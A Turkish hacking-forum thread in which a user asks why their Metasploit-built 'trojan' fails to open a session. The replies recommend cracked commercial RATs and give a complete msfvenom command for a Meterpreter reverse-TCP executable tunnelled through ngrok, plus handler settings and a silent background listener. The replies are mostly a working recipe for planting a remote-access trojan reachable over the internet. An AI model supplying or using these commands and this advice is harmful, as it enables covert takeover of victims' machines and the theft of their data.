Hoşgeldin Misafir

Trojenim çalışıyor ama bağlanamıyorum

Motivasyon

25 May 2023
49 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba arkadaşlar kaliden sanal windowsumu hacklemeye çalışıyorum

Trojen oluşturdum lhost ve lport istedi doğru girdim

Sonra msfconsole den dinlenme ayarlarını girdim lhost ve lport trojenle aynı şekilde girdim en son windowstan trojeni açtım ve exploit dediğimde böyle bir sorunla karşilaşıyorum

exploit completed but no session was created

Muncuk Han

Muncuk Han

akp gençlik kolları başkanı
31 Ağu 2021
792 Mesaj
TIM Görevleri
1

Aktiflik

Seviye

Deneyim

TIM / GÖREV:

Sonra msfconsole den dinlenme ayarlarını girdim lhost ve lport trojenle aynı şekilde girdim en son windowstan trojeni açtım ve exploit dediğimde böyle bir sorunla karşilaşıyorum

san tavsiyem kendi trojenini yazman msfkonsol gibi araçlar üzerinden oluşturlan ratlar açık söylemek gerekirse çok kötü geliyor bana ya da daha profosyonel olan webratları kullana bilirisn krek bula bilirisn bu ratları

0000

5 Ağu 2023
134 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:

Merhaba, sorun yüksek ihtimalle portunuzdur ve portunu düzeltmen için gereken yol ngrok isimli araca başvurman.
Peki nasıl mı kullanacaksın?
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows lhost=<ngroktan aldığınız ip> lport=<ngroktan aldığınız port kendi yazdığınız değil> -f exe -o /root/yenivirus.exe

daha sonrasında bağlanmak için ise msfconsol'u aç ve
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
daha sonrasında ayarları değiştireceğiz..
set LHOST 0.0.0.0 (özellikle 0 kullanman lazım.)
set LPORT (Ngroka açmasını söylediğin port örnek ngrok tcp 8080 ise 8080 yaz üst tarafta lport'a ngroktan aldığın portu yazarken ngrokun sana verdiği ayrı bir port var onu kastettim. x.tcp.ngrok.com dan sonraki sayıları yani, bu arada x.tcp.ngrok olan lhostun :) .)

exploit -j -z yaparak sessizde dinleyiciyi çalıştırabilirsin. Bir de şimdi dene!